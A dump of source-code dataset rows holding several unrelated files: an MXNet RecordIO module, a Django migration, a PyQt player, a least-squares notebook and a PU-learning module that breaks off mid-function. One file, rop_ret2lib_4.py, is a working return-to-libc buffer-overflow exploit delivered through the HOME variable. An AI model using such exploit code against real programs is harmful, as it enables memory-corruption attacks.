blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5baa937a803d1bfa2ca8c947fddf74cbd2b9d73b
|
3a218403531ef396e32daccf7f8e7812c9f7e8d2
|
/python/mxnet/seg_recordio.py
|
b2a2beb6c7930fea97fd62c2d0857e160dca47e4
|
[
"BSD-3-Clause",
"Zlib",
"Apache-2.0",
"BSD-2-Clause",
"BSD-2-Clause-Views"
] |
permissive
|
coderzbx/seg-mxnet
|
ac0f9cf450d0b4bebb26110921c83831ca832615
|
a3ef65a1991d59c23b6111048fdc16d38e2862af
|
refs/heads/master
| 2022-11-30T04:09:49.476375 | 2018-05-16T12:50:29 | 2018-05-16T12:50:29 | 127,411,826 | 0 | 1 |
Apache-2.0
| 2022-11-25T01:35:29 | 2018-03-30T09:51:04 |
C++
|
UTF-8
|
Python
| false | false | 15,191 |
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Read and write for the RecordIO data format."""
from __future__ import absolute_import
from collections import namedtuple
import ctypes
import struct
import numbers
import numpy as np
from .base import _LIB
from .base import RecordIOHandle
from .base import check_call
from .base import c_str
try:
import cv2
except ImportError:
cv2 = None
class MXSegRecordIO(object):
"""Reads/writes `RecordIO` data format, supporting sequential read and write.
Example usage:
----------
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'w')
<mxnet.recordio.MXSegRecordIO object at 0x10ef40ed0>
>>> for i in range(5):
... record.write('record_%d'%i)
>>> record.close()
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'r')
>>> for i in range(5):
... item = record.read()
... print(item)
record_0
record_1
record_2
record_3
record_4
>>> record.close()
Parameters
----------
uri : string
Path to the record file.
flag : string
'w' for write or 'r' for read.
"""
def __init__(self, uri, flag):
self.uri = c_str(uri)
self.handle = RecordIOHandle()
self.flag = flag
self.is_open = False
self.open()
def open(self):
"""Opens the record file."""
if self.flag == "w":
check_call(_LIB.MXRecordIOWriterCreate(self.uri, ctypes.byref(self.handle)))
self.writable = True
elif self.flag == "r":
check_call(_LIB.MXRecordIOReaderCreate(self.uri, ctypes.byref(self.handle)))
self.writable = False
else:
raise ValueError("Invalid flag %s"%self.flag)
self.is_open = True
def __del__(self):
self.close()
def close(self):
"""Closes the record file."""
if not self.is_open:
return
if self.writable:
check_call(_LIB.MXRecordIOWriterFree(self.handle))
else:
check_call(_LIB.MXRecordIOReaderFree(self.handle))
self.is_open = False
def reset(self):
"""Resets the pointer to first item.
If the record is opened with 'w', this function will truncate the file to empty.
Example usage:
----------
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'r')
>>> for i in range(2):
... item = record.read()
... print(item)
record_0
record_1
>>> record.reset() # Pointer is reset.
>>> print(record.read()) # Started reading from start again.
record_0
>>> record.close()
"""
self.close()
self.open()
def write(self, buf):
"""Inserts a string buffer as a record.
Example usage:
----------
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'w')
>>> for i in range(5):
... record.write('record_%d'%i)
>>> record.close()
Parameters
----------
buf : string (python2), bytes (python3)
Buffer to write.
"""
assert self.writable
check_call(_LIB.MXRecordIOWriterWriteRecord(self.handle,
ctypes.c_char_p(buf),
ctypes.c_size_t(len(buf))))
def read(self):
"""Returns record as a string.
Example usage:
----------
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'r')
>>> for i in range(5):
... item = record.read()
... print(item)
record_0
record_1
record_2
record_3
record_4
>>> record.close()
Returns
----------
buf : string
Buffer read.
"""
assert not self.writable
buf = ctypes.c_char_p()
size = ctypes.c_size_t()
check_call(_LIB.MXRecordIOReaderReadRecord(self.handle,
ctypes.byref(buf),
ctypes.byref(size)))
if buf:
buf = ctypes.cast(buf, ctypes.POINTER(ctypes.c_char*size.value))
return buf.contents.raw
else:
return None
class MXIndexedSegRecordIO(MXSegRecordIO):
"""Reads/writes `RecordIO` data format, supporting random access.
Example usage:
----------
>>> for i in range(5):
... record.write_idx(i, 'record_%d'%i)
>>> record.close()
>>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'r')
>>> record.read_idx(3)
record_3
Parameters
----------
idx_path : str
Path to the index file.
uri : str
Path to the record file. Only supports seekable file types.
flag : str
'w' for write or 'r' for read.
key_type : type
Data type for keys.
"""
def __init__(self, idx_path, uri, flag, key_type=int):
self.idx_path = idx_path
self.idx = {}
self.keys = []
self.key_type = key_type
self.fidx = None
super(MXIndexedSegRecordIO, self).__init__(uri, flag)
def open(self):
super(MXIndexedSegRecordIO, self).open()
self.idx = {}
self.keys = []
self.fidx = open(self.idx_path, self.flag)
if not self.writable:
for line in iter(self.fidx.readline, ''):
line = line.strip().split('\t')
key = self.key_type(line[0])
self.idx[key] = int(line[1])
self.keys.append(key)
def close(self):
"""Closes the record file."""
if not self.is_open:
return
super(MXIndexedSegRecordIO, self).close()
self.fidx.close()
def seek(self, idx):
"""Sets the current read pointer position.
This function is internally called by `read_idx(idx)` to find the current
reader pointer position. It doesn't return anything."""
assert not self.writable
pos = ctypes.c_size_t(self.idx[idx])
check_call(_LIB.MXRecordIOReaderSeek(self.handle, pos))
def tell(self):
"""Returns the current position of write head.
Example usage:
----------
>>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'w')
>>> print(record.tell())
0
>>> for i in range(5):
... record.write_idx(i, 'record_%d'%i)
... print(record.tell())
16
32
48
64
80
"""
assert self.writable
pos = ctypes.c_size_t()
check_call(_LIB.MXRecordIOWriterTell(self.handle, ctypes.byref(pos)))
return pos.value
def read_idx(self, idx):
"""Returns the record at given index.
Example usage:
----------
>>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'w')
>>> for i in range(5):
... record.write_idx(i, 'record_%d'%i)
>>> record.close()
>>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'r')
>>> record.read_idx(3)
record_3
"""
self.seek(idx)
return self.read()
def write_idx(self, idx, buf):
"""Inserts input record at given index.
Example usage:
----------
>>> for i in range(5):
... record.write_idx(i, 'record_%d'%i)
>>> record.close()
Parameters
----------
idx : int
Index of a file.
buf :
Record to write.
"""
key = self.key_type(idx)
pos = self.tell()
self.write(buf)
self.fidx.write('%s\t%d\n'%(str(key), pos))
self.idx[key] = pos
self.keys.append(key)
ISegRHeader = namedtuple('HEADER', ['flag', 'label', 'image_size', 'label_size', 'id', 'id2'])
"""An alias for HEADER. Used to store metadata (e.g. labels) accompanying a record.
See mxnet.recordio.pack and mxnet.recordio.pack_img for example uses.
Parameters
----------
flag : int
Available for convenience, can be set arbitrarily.
label : float or an array of float
Typically used to store label(s) for a record.
image_size: int
length of image string.
label_size: int
length of label string.
id: int
Usually a unique id representing record.
id2: int
Higher order bits of the unique id, should be set to 0 (in most cases).
"""
_ISEGR_FORMAT = 'IfIIQQ'
_IR_SIZE = struct.calcsize(_ISEGR_FORMAT)
def pack(header, image_data, label_data):
"""Pack a string into MXImageRecord.
Parameters
----------
header : ISegRHeader
Header of the image record.
image_data : str
Raw image string to be packed.
label_data : str
Raw label string to be packed.
Returns
-------
s : str
The packed string.
Examples
--------
>>> id = 2574
>>> img = cv2.imread(fullpath, cv2.IMREAD_COLOR)
>>> ret, buf = cv2.imencode(".jpg", img)
>>> assert ret, 'failed to encode image'
>>> image_data = buf.tostring()
>>> image_len = len(image_data)
>>> label_path = item[-1]
>>> label = cv2.imread(label_path, cv2.IMREAD_GRAYSCALE)
>>> ret, buf = cv2.imencode(".png", label)
>>> assert ret, 'failed to encode label'
>>> label_data = buf.tostring()
>>> label_len = len(label_data)
>>> header = mx.seg_recordio.ISegRHeader(0, 0, image_len, label_len, id, 0)
>>> packed_s = mx.seg_recordio.pack(header, image_data, label_data)
"""
# test_s = image_data + label_data
# test_len = len(test_s)
# image_len = len(image_data)
# label_len = len(label_data)
header = ISegRHeader(*header)
s = struct.pack(_ISEGR_FORMAT, *header) + image_data + label_data
# total_len = len(s)
# if (image_len + label_len) != (header.image_size + header.label_size):
# print("{}<>{}+{}".format(total_len, header.image_size, header.label_size))
return s
def unpack(s):
"""Unpack a MXImageRecord to string.
Parameters
----------
s : str
String buffer from ``MXRecordIO.read``.
Returns
-------
header : IRHeader
Header of the image record.
s : str
Unpacked string.
Examples
--------
>>> record = mx.seg_recordio.MXSegRecordIO('test.rec', 'r')
>>> item = record.read()
>>> header, s = mx.seg_recordio.unpack(item)
>>> header
HEADER(flag=0, label=0, image_len=368032, label_len=38742, id=20129312, id2=0)
"""
header = ISegRHeader(*struct.unpack(_ISEGR_FORMAT, s[:_IR_SIZE]))
s = s[_IR_SIZE:]
if header.flag > 0:
s = s[header.flag*4:]
return header, s
def unpack_img(s, iscolor=-1):
"""Unpack a MXImageSegRecord to image.
Parameters
----------
s : str
String buffer from ``MXSegRecordIO.read``.
iscolor : int
Image format option for ``cv2.imdecode``.
Returns
-------
header : IRHeader
Header of the image record.
img : numpy.ndarray
Unpacked image.
Examples
--------
>>> record = mx.seg_recordio.MXSegRecordIO('test.rec', 'r')
>>> item = record.read()
>>> header, img, label = mx.seg_recordio.unpack_img(item)
>>> header
HEADER(flag=0, label=0, id=20129312, id2=0)
>>> img
array([[[ 23, 27, 45],
[ 28, 32, 50],
...,
[ 36, 40, 59],
[ 35, 39, 58]],
...,
[[ 91, 92, 113],
[ 97, 98, 119],
...,
[168, 169, 167],
[166, 167, 165]]], dtype=uint8)
"""
header, s = unpack(s)
image_data = np.frombuffer(s, dtype=np.uint8, count=header.image_size, offset=0)
label_data = np.frombuffer(s, dtype=np.uint8, count=header.label_size, offset=header.image_size)
assert cv2 is not None
image = cv2.imdecode(image_data, cv2.IMREAD_COLOR)
label = cv2.imdecode(label_data, cv2.IMREAD_GRAYSCALE)
return header, image, label
def pack_img(header, img, label, quality=95, img_fmt='.jpg', label_fmt='.png'):
"""Pack an image into ``MXImageRecord``.
Parameters
----------
header : IRHeader
Header of the image record.
img : numpy.ndarray
Image to be packed.
label: numpy.ndarry
Label to be packed
quality : int
Quality for JPEG encoding in range 1-100, or compression for PNG encoding in range 1-9.
img_fmt : str
Encoding of the image (.jpg for JPEG, .png for PNG).
label_fmt : str
Encoding of the label (.jpg for JPEG, .png for PNG).
Returns
-------
s : str
The packed string.
Examples
--------
>>> id = 2574
>>> image = cv2.imread('test.jpg', cv2.IMREAD_COLOR)
>>> ret, buf = cv2.imencode(".jpg", img)
>>> assert ret, 'failed to encode image'
>>> image_data = buf.tostring()
>>> image_len = len(image_data)
>>> label = cv2.imread('test.png', cv2.IMREAD_GRAYSCALE)
>>> ret, buf = cv2.imencode(".png", label)
>>> assert ret, 'failed to encode label'
>>> label_data = buf.tostring()
>>> label_len = len(label_data)
>>> header = mx.seg_recordio.ISegRHeader(0, 0, image_len, label_len, id, 0)
>>> packed_s = mx.seg_recordio.pack_img(header, image, label)
"""
assert cv2 is not None
encode_params = None
jpg_formats = ['.JPG', '.JPEG']
png_formats = ['.PNG']
if img_fmt.upper() in jpg_formats:
encode_params = [cv2.IMWRITE_JPEG_QUALITY, quality]
elif img_fmt.upper() in png_formats:
encode_params = [cv2.IMWRITE_PNG_COMPRESSION, quality]
ret, buf = cv2.imencode(img_fmt, img, encode_params)
assert ret, 'failed to encode image'
image_data = buf.tostring()
if label_fmt.upper() in jpg_formats:
encode_params = [cv2.IMWRITE_JPEG_QUALITY, quality]
elif label_fmt.upper() in png_formats:
encode_params = [cv2.IMWRITE_PNG_COMPRESSION, quality]
ret, buf = cv2.imencode(label_fmt, label, encode_params)
assert ret, 'failed to encode image'
label_data = buf.tostring()
image_len = len(image_data)
label_len = len(label_data)
header = ISegRHeader(header.flag, header.label, image_len, label_len, header.id, 0)
return pack(header, image_data, label_data)
|
[
"[email protected]"
] | |
798e600ffd6cebdf2aa06b2b71741f788ad7e5d9
|
b198f2276f3f26bed9aaae347429875e573a0355
|
/Interview_Coding_Questions/extract_ip.py
|
5f8f784aaec2f3b0fcda2ea23d0eec658ea14071
|
[] |
no_license
|
PKStuff/task
|
c4dedd8d3cd3e34ac203839592e645d112a20ff2
|
36e0ad50aabc398135b98224eb7cca05867aa3eb
|
refs/heads/master
| 2021-06-13T22:22:56.332364 | 2021-02-09T11:57:46 | 2021-02-09T11:57:46 | 136,037,052 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 305 |
py
|
"""
This is my IP address 10.10.20.189 on network 2020.1.1 and also 192.168.0.1
"""
def extractIP(s1):
s1 = s1.split()
for string in s1:
if string.count('.') == 3:
print(string)
s1 = "This is my IP address 10.10.20.189 on network 2020.1.1 and also 192.168.0.1"
extractIP(s1)
|
[
"[email protected]"
] | |
c3ef23d87718434c242e7c55f33d4ccb0809bb27
|
77170eede81686cc4cac018e243b04d74c146ae6
|
/rop_ret2lib_4.py
|
64b7fdb79598929c51f1333fcbd3f1d116e8460c
|
[] |
no_license
|
Ravin-Academy/rop_ret2libc
|
76e1888608af3270a847e22f019c33a2eeefe7d1
|
88692860b0d601ab11eaad1743ef45a487dbe677
|
refs/heads/main
| 2023-02-20T03:43:55.360916 | 2021-01-23T16:00:14 | 2021-01-23T16:00:14 | 332,245,113 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 528 |
py
|
#!/usr/bin/python
from struct import *
import os
libc_binsh = pack("<I", 0xf7ef7aaa)
libc_printf = pack("<I", 0xf7dcb860)
libc_exit = pack("<I", 0xf7daaa60)
libc_popret = pack("<I", 0xf7e76671)
ret = pack("<I", 0x804900a)
rop_popret = pack("<I", 0x804901e)
buffer = ''
buffer += "A" * 312
# printf("/bin/sh")
buffer += libc_printf
buffer += libc_popret
buffer += pack("<I", 0xf7ef8b41)
# exit()
buffer += libc_exit
buffer += ret
PROGNAME = "./dav"
os.environ['HOME'] = buffer
os.execve(PROGNAME, [PROGNAME], os.environ)
|
[
"[email protected]"
] | |
eb76b301f837d1da1c9bc0341c4261cae372ca7f
|
9bc2f8151e15d59b0c0327be3deaa7f126814946
|
/setup.py
|
0078180a166fe2d5240476c3ffeca45415ac549b
|
[
"MIT"
] |
permissive
|
ashwin1111/sageintacct-sdk-py
|
b6f817093ff0fb0ef60b46153d19b2ba13e595ed
|
ed3a1a27580d00b589af5b9a738994d8204b1062
|
refs/heads/master
| 2022-11-14T11:44:02.750873 | 2020-07-03T09:26:34 | 2020-07-03T09:26:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 895 |
py
|
"""
Project setup file
"""
import setuptools
with open('README.md', 'r') as f:
long_description = f.read()
setuptools.setup(
name='sageintacctsdk',
version='0.1.0',
author='Ashwin T',
author_email='[email protected]',
description='Python SDK for accessing Sage Intacct APIs',
license='MIT',
long_description=long_description,
long_description_content_type='text/markdown',
keywords=['sage-intacct', 'sage', 'fyle', 'api', 'python', 'sdk'],
url='https://github.com/fylein/sageintacct-sdk-py',
packages=setuptools.find_packages(),
install_requires=['requests==2.22.0', 'xmltodict==0.12.0'],
classifiers=[
'Topic :: Internet :: WWW/HTTP',
'Intended Audience :: Developers',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
]
)
|
[
"[email protected]"
] | |
328bccf4b3138a2c108c76e34c1341d685b88b08
|
7e2af9fa47719462a238693c26ac9c872749c58c
|
/Environments/project1_env/lib/python3.6/linecache.py
|
5aed931c8d3afc86198b3c5b70a44b3aa147d47a
|
[] |
no_license
|
williamsonchris/Udacity
|
b0a169f6a02f5897cd810de51f7e4657ccc29b17
|
4c947484f096fff2d8a5916145d3288b461efe25
|
refs/heads/master
| 2020-03-30T08:45:44.107299 | 2018-10-02T05:14:20 | 2018-10-02T05:14:20 | 151,037,529 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 46 |
py
|
/Users/CW/anaconda3/lib/python3.6/linecache.py
|
[
"[email protected]"
] | |
169f922fde12e42c0892becb0540abb35f3580b1
|
0fdac0d61352d3759cec291cababeef4c65c59f4
|
/mp3player.py
|
985cf2c87944d304a617b3c8dbd07a46c7d4d1c1
|
[] |
no_license
|
masterx2/VKD
|
e638b1d00233c87a48c3c55753d3e01f901c123f
|
d4aedaaa05d754ddf68c586a224443968efbc6dd
|
refs/heads/master
| 2016-08-06T13:03:55.980854 | 2013-06-23T16:52:42 | 2013-06-23T16:52:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,501 |
py
|
__author__ = 'MasterX2'
from PyQt4 import QtGui, QtCore
from PyQt4.phonon import Phonon
class Window(QtGui.QPushButton):
def __init__(self):
QtGui.QPushButton.__init__(self, 'Choose File')
self.mediaObject = Phonon.MediaObject(self)
self.audioOutput = Phonon.AudioOutput(Phonon.MusicCategory, self)
Phonon.createPath(self.mediaObject, self.audioOutput)
self.mediaObject.stateChanged.connect(self.handleStateChanged)
self.clicked.connect(self.handleButton)
def handleButton(self):
if self.mediaObject.state() == Phonon.PlayingState:
self.mediaObject.stop()
else:
path = QtGui.QFileDialog.getOpenFileName(self, self.text())
if path:
self.mediaObject.setCurrentSource(Phonon.MediaSource(path))
self.mediaObject.play()
def handleStateChanged(self, newstate, oldstate):
if newstate == Phonon.PlayingState:
self.setText('Stop')
elif newstate == Phonon.StoppedState:
self.setText('Choose File')
elif newstate == Phonon.ErrorState:
source = self.mediaObject.currentSource().fileName()
print 'ERROR: could not play:', source.toLocal8Bit().data()
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
app.setApplicationName('Phonon')
win = Window()
win.resize(200, 100)
win.show()
sys.exit(app.exec_())
|
[
"[email protected]"
] | |
fbb0c4e5b8fe265c6360855246cde8f9766f8dcf
|
7df98e150bb9bf9c4ef3299a00e70de80ef0fdad
|
/04-estimation/01-intro-to-estimation/website/22. Least Squares Notebook/Least-Squares-Solution.py
|
a8c9cc81fb40cb6d332f32dbed702c7e4ffeaa28
|
[] |
no_license
|
AkshadK/autonomous-flight-course-notes
|
fda761a31f2e208eab241bc4823fcf4dfa86a22b
|
6dc4cdf765c3018eb90c4e806d46841669d37c9e
|
refs/heads/master
| 2023-05-02T23:51:09.677180 | 2020-05-17T13:57:42 | 2020-05-17T13:57:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,841 |
py
|
#!/usr/bin/env python
# coding: utf-8
# # Least Squares
#
# In this notebook you'll use least squares to estimate a state vector $x$, given $m$ noisy measurements derived from:
#
# $
# \tilde{y} = Hx + v
# $
#
# $v$ is sampled from gaussian $N(0, R)$, and $H$ is a matrix mapping the state space to the measurement space. We'll assume x is constant, meaning the vehicle is currently not moving.
#
# Thus you'll want to select an estimate of the state $x$, $\hat{x}$ which maximizes the likelihood of the observed measurements $\tilde{y}$:
#
# $
# p(y = \tilde{y} | x = \hat{x})
# $
# In[2]:
import numpy as np
import matplotlib.pyplot as plt
import numpy.linalg as LA
get_ipython().run_line_magic('matplotlib', 'inline')
# ### Setup
# In[3]:
# number of samples
# the larger this value the more
# accurate the x hat will be.
n_samples = 100
# size of state
n = 4
# In[4]:
def make_H(m, degree, t):
"""
Creates a matrix where
each row is of the form:
[t**degree, t**(degree-1), ..., 1]
"""
H = np.zeros((m, degree))
for i in np.arange(degree-1, -1, -1):
H[:, -i-1] = t**i
return H
# In[5]:
# known constants
t = np.random.uniform(-5, 5, n_samples)
H = make_H(n_samples, n, t)
# state, unknown in practice
x = np.random.randn(n) * 2
# ### Collecting Observations
#
# First you'll have to collect $m$ noisy observations, these will be used later to estimate $x$.
#
# **NOTE: You may have not encountered the `@` syntax. In a nutshell, `np.dot(H, x)` is equivalent to `H @ x`. If the equation contains multiple matrix multiplications, using `@` provides a much more comprehensible expression. **
# In[6]:
# TODO: collect m noisy observations, the noise distribution should be gaussian
y_obs = H @ x + np.random.normal(0, 1, size=(n_samples))
# In[7]:
plt.plot(t, y_obs, 'bx')
plt.title("Noisy Observations")
# The observations plot produces a polynomial of order `len(x) - 1`, i.e. a 4-element state produces a 3rd order polynomial. In this case the state $x$ are the coefficients of the polynomial. By generating observation from evaluating the polynomial at several different points we can gain a good approximation of the original state.
#
# As one might imagine, recovering a good approximation of the state requires more samples as the order of the polynomial increases.
# ### Estimating $x$
#
# Given enough samples $\hat{x}$ should converge to $x$. The exact number of measurements required depends on the complexity of mapping the state space to the measurement space, $H$ and how noisy the measurements are, determined by $v$.
#
# Recall from lecture:
#
# $
# \hat{x} = (H^T H)^{-1} H^T \tilde{y}
# $
#
# $\hat{x}$ should be similar to $x$.
# In[8]:
x_hat = LA.pinv(H.T @ H) @ H.T @ y_obs
# In[9]:
print(x_hat)
print(x)
# In[ ]:
|
[
"[email protected]"
] | |
b1b9341f9c0553978ee251653b9c3eee26549c87
|
34e10f715b0d49b024eb1210f1da0edc5cfbc6da
|
/calls/migrations/0004_auto_20200405_1653.py
|
94d94b8bf10ef53fc48cbb09d9ac6f995baf5442
|
[] |
no_license
|
learyjk/call_logger
|
83969eba59098662336061b3d470386948e27ad2
|
67dc8118fbbe4e8973433a4bf94267fe0c4af3fb
|
refs/heads/master
| 2022-11-27T12:57:36.352216 | 2020-04-12T16:14:07 | 2020-04-12T16:14:07 | 253,056,118 | 1 | 0 | null | 2022-11-22T05:50:10 | 2020-04-04T17:15:59 |
Python
|
UTF-8
|
Python
| false | false | 465 |
py
|
# Generated by Django 3.0.5 on 2020-04-05 16:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('calls', '0003_auto_20200404_1658'),
]
operations = [
migrations.AlterField(
model_name='call',
name='callee',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='calls.Callee'),
),
]
|
[
"[email protected]"
] | |
a59a925a98390920d0baad245a444b9e4bd3bdd7
|
8998e4da64a41950d2f027df0290a2feae8f4cab
|
/Pumml/pumml/learners.py
|
7fccbcb32b1518b193d66dbb53b740dbd79cf9e3
|
[] |
no_license
|
bjutliulei/Positive-and-Unlabeled-Learning
|
323a825dd61995585d62472dbe9ad227527e0a65
|
c52d2024d85548a8469a17b83c94fa5ba1f4b812
|
refs/heads/main
| 2023-02-25T18:16:23.284594 | 2021-01-28T09:48:34 | 2021-01-28T09:48:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 19,233 |
py
|
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_recall_fscore_support
from sklearn.cluster import KMeans
from sklearn.mixture import GaussianMixture, BayesianGaussianMixture
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import precision_recall_curve
from sklearn.model_selection import RepeatedKFold
from sklearn.utils import resample
from mpl_toolkits.mplot3d import Axes3D
from monty.serialization import dumpfn
import pandas as pd
import seaborn as sns
import os
import pickle
import numpy as np
import matplotlib.pyplot as plt
"""
This module provides classes for training, testing, and deploying a PU learning model for predicting material synthesizability. Utility functions for plotting aid in visualizing and analyzing results.
References:
[1] DOI: 10.1021/acsnano.8b08014
[2] DOI: 10.1145/1401890.1401920
[3] DOI: 10.1016/j.patrec.2013.06.010
"""
__author__ = "Nathan C. Frey, Jin Wang"
__copyright__ = "MIT License"
__version__ = "0.0.1"
__maintainer__ = "Nathan C. Frey"
__email__ = "[email protected]"
__status__ = "Development"
__date__ = "Aug 2017"
class PULearner():
def __init__(self):
"""A machine learning model that predicts material synthesizability.
Positive samples are experimentally synthesized materials. Unlabled samples are not-yet synthesized materials that are part of the same material family.
Features for training data might be generated by first principles (density functional theory) calculations.
Hyperparameters are initialized with sensible defaults, but any newly trained model should have hyperparams carefully converged.
Args:
Attributes:
pu_stats (dict): Outputs of cv_baggingDT
df_U (DataFrame): Unlabeled data.
df_P (DataFrame): Positive data.
synth_scores (list): Synthesizability scores (between 0 and 1) of unlabeled samples.
labels (list): Likely synthesizable (1) or not (0)
feat_importances (DataFrame): Feature importances from trained
decision tree classifiers. Index corresponds to feature index in original data.
"""
def cv_baggingDT(self, pu_data, splits=3, repeats=100, bags=100, filename=''):
"""
Train bagged decision tree base classifiers and do repeated
k-fold CV.
Synthesizability scores (0 = not synthesizable, 1 = already
synthesized) are generated for an unlabeled sample by averaging
the scores from the ensemble of decision tree classifiers that
have not been trained on that sample.
Args:
pu_data (json): A file of numeric features describing materials. There MUST be a column called "PU_label" where a 1 value indicates a synthesized (positive) compound and a 0 value indicates an unlabeled compound.
splits (int): Number of splits in k-fold CV.
repeats (int): Number of repeated k-fold CV.
bags (int): Number of bags in bootstrap aggregation.
filename (string): Save model training results to file with
filename ending in .json or .pkl.
Returns:
pu_stats (dict): Metrics and outputs of PU learning model
training.
"""
print('Start PU Learning.')
# Preprocess data and set attributes
df = pd.read_json(pu_data)
df_P, df_U, X_P, X_U = self._process_pu_data(df)
self.df_P = df_P
self.df_U = df_U
# Split data into training and test splits for k-fold CV
kfold = RepeatedKFold(n_splits=splits, n_repeats=repeats,
random_state=42)
# Scores for PU learning (tpr = True Positive Rate)
scores = []
tprs = []
# Predicted synthesis probabilty of CVed P and U sets
prob_P = np.ones(shape=(X_P.shape[0], splits * repeats))
prob_U = -np.ones(shape=(X_U.shape[0], splits *repeats))
# Feature importance
feat_rank = np.zeros(shape=(X_P.shape[1], splits*repeats))
idsp = 0 # index of repeated k splits
# Loop over P and U training/test samples
for (ptrain, ptest), (utrain, utest) in zip(kfold.split(X_P), kfold.split(X_U)):
# Number of P and U training samples
N_ptrain = X_P[ptrain].shape[0]
N_utrain = X_U[utrain].shape[0]
d = X_P.shape[1]
K = N_ptrain
train_label = np.zeros(shape=(N_ptrain + K,))
train_label[:N_ptrain] = 1.0 # Synthesized (positive)
# Out of bag samples
n_oob = np.zeros(shape=(N_utrain,))
f_oob = np.zeros(shape=(N_utrain, 2))
# Sums of probabilities of test sets
f_ptest = np.zeros(shape=(X_P[ptest].shape[0], 2))
f_utest = np.zeros(shape=(X_U[utest].shape[0], 2))
# Bootstrap resampling for each bag
for i in range(bags):
bootstrap_sample = np.random.choice(np.arange(N_utrain), replace=True, size=K)
# Positive samples and bootstrapped unlabeled samples
data_bootstrap = np.concatenate((X_P[ptrain], X_U[bootstrap_sample, :]), axis=0)
# Train decision tree classifier
model = DecisionTreeClassifier(max_depth=None, max_features=None, criterion='gini', class_weight='balanced')
model.fit(data_bootstrap, train_label)
# Index for the oob samples
idx_oob = sorted(set(range(N_utrain)) - set(np.unique(bootstrap_sample)))
# Transductive learning on oob samples
f_oob[idx_oob] += model.predict_proba(X_U[utrain][idx_oob])
n_oob[idx_oob] += 1
f_ptest += model.predict_proba(X_P[ptest])
f_utest += model.predict_proba(X_U[utest])
feat_rank[:,idsp] = model.feature_importances_
# Predicted synthesis probabilities of unlabeled samples
predict_utrain = f_oob[:, 1] / n_oob
# Predicted probabilities for P and U test sets
predict_ptest = f_ptest[:, 1] / bags
predict_utest = f_utest[:, 1] / bags
# Find predicted positives
true_pos = predict_ptest[np.where(predict_ptest > 0.5)].shape[0]
u_pos = predict_utest[np.where(predict_utest > 0.5)].shape[0]
N_ptest = X_P[ptest].shape[0]
N_utest = X_U[utest].shape[0]
# Predicted positive ratio in test set
p_pred_pos = (true_pos + u_pos)/(N_ptest + N_utest) + 0.0001
# Compute PU recall (TPR) and score metrics
recall = true_pos / N_ptest
score = recall**2 / p_pred_pos
scores.append(score)
tprs.append(recall)
# Predicted probabilities
prob_P[ptest, idsp] = predict_ptest
prob_U[utrain, idsp] = predict_utrain
prob_U[utest, idsp] = predict_utest
idsp += 1
# Progress update
if (idsp + 1) % splits == 0:
tpr_tmp = np.asarray(tprs[-splits - 1: -1])
print("Performed Repeated " + str(splits) + "-fold: " + str(idsp//splits + 1) + " out of " + str(repeats))
print("True Positive Rate: %0.2f (+/- %0.2f)" % (tpr_tmp.mean(), tpr_tmp.std() * 2))
# Predicted labels from k-fold CV
label_U = np.zeros(shape=(X_U.shape[0], splits * repeats + 1),dtype=int)
label_U[:, :splits * repeats][np.where(prob_U > 0.5)] = 1
label_U[:,splits * repeats] = np.sum(label_U[:, :splits*repeats + 1],axis=1)
tprs = np.asarray(tprs)
scores = np.asarray(scores)
# Metrics for each model in the k-folds
label_U_rp = np.zeros(shape=(X_U.shape[0], repeats), dtype=int)
prob_U_rp = np.zeros(shape=(X_U.shape[0], repeats))
feat_rank_rp = np.zeros(shape=(X_U.shape[1], repeats))
tpr_rp = np.zeros(shape=(repeats,))
